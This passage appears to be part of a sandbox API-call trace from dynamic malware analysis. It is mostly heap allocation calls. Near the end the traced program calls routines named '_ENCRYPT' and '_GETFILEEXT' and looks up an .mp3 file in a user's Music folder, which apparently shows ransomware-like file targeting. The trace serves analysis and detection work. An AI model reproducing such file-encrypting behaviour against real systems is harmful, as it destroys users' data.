dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0185.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0185.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0185.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0185.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0185.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0185.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0185.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0185.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0185.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0185.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0185.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0185.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0185.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0185.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0185.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0185.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0185.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0185.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0185.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0185.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0185.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0185.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0185.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0185.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0185.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0185.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0185.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0185.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0185.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0185.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0185.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0185.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0185.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0185.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0185.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0185.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0185.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0185.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0185.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0185.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0185.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0185.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0185.861] FreeLibrary (hLibModule=0x75990000) returned 1 [0185.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0185.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0185.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0185.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0185.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0185.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0185.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0185.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0185.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0185.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0185.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0185.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0185.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0185.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0185.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0185.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0185.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0185.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0185.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0185.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0185.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0185.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0185.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0185.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0185.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0185.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0185.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0185.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0185.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0185.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0185.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0185.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0185.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0185.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0185.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0185.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0185.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0185.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0185.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0185.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0185.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0185.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0185.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0185.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0185.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0185.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0185.862] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0185.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0185.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0185.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0185.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0185.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0185.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0185.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0185.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0185.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0185.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0185.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0185.863] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0185.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0185.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0185.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0185.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0185.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0185.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0185.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0185.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0185.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0185.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0185.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0185.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0185.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0185.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0185.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0185.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0185.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0185.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0185.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0185.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0185.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0185.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0185.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0185.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0185.864] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0185.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0185.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0185.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0185.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0185.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0185.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0185.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0185.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0185.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0185.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0185.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0185.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0185.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0185.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0185.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0185.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0185.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0185.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0185.865] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0185.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0185.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0185.865] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0185.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd4f8 [0185.865] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd4f8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0185.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0185.865] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0185.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0185.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0185.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0185.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0185.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0185.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0185.865] CloseHandle (hObject=0x120) returned 1 [0185.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0185.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0185.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0185.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0185.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0185.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0185.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0185.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0185.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0185.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0185.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0185.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0185.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0185.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0185.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0185.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0185.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0185.866] FreeLibrary (hLibModule=0x75990000) returned 1 [0185.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0185.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0185.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0185.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0185.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0185.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0185.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0185.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0185.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0185.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0185.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0185.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0185.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0185.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0185.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0185.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0185.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0185.868] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0185.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0185.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0185.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0185.868] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0185.868] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0185.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0185.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0185.869] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0185.869] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0185.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0185.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0185.869] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0185.869] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0185.869] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0185.869] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0185.869] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0185.869] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\O8LnB5uJ.mp3", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c108870, ftCreationTime.dwHighDateTime=0x1d5dba5, ftLastAccessTime.dwLowDateTime=0x200a6cc0, ftLastAccessTime.dwHighDateTime=0x1d5e384, ftLastWriteTime.dwLowDateTime=0x200a6cc0, ftLastWriteTime.dwHighDateTime=0x1d5e384, nFileSizeHigh=0x0, nFileSizeLow=0x1227f, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="O8LnB5uJ.mp3", cAlternateFileName="")) returned 0x90add8 [0185.870] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0185.870] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\O8LnB5uJ.mp3", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c108870, ftCreationTime.dwHighDateTime=0x1d5dba5, ftLastAccessTime.dwLowDateTime=0x200a6cc0, ftLastAccessTime.dwHighDateTime=0x1d5e384, ftLastWriteTime.dwLowDateTime=0x200a6cc0, ftLastWriteTime.dwHighDateTime=0x1d5e384, nFileSizeHigh=0x0, nFileSizeLow=0x1227f, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="O8LnB5uJ.mp3", cAlternateFileName="")) returned 0x90add8 [0185.871] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0185.871] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\O8LnB5uJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0185.871] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\O8LnB5uJ.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 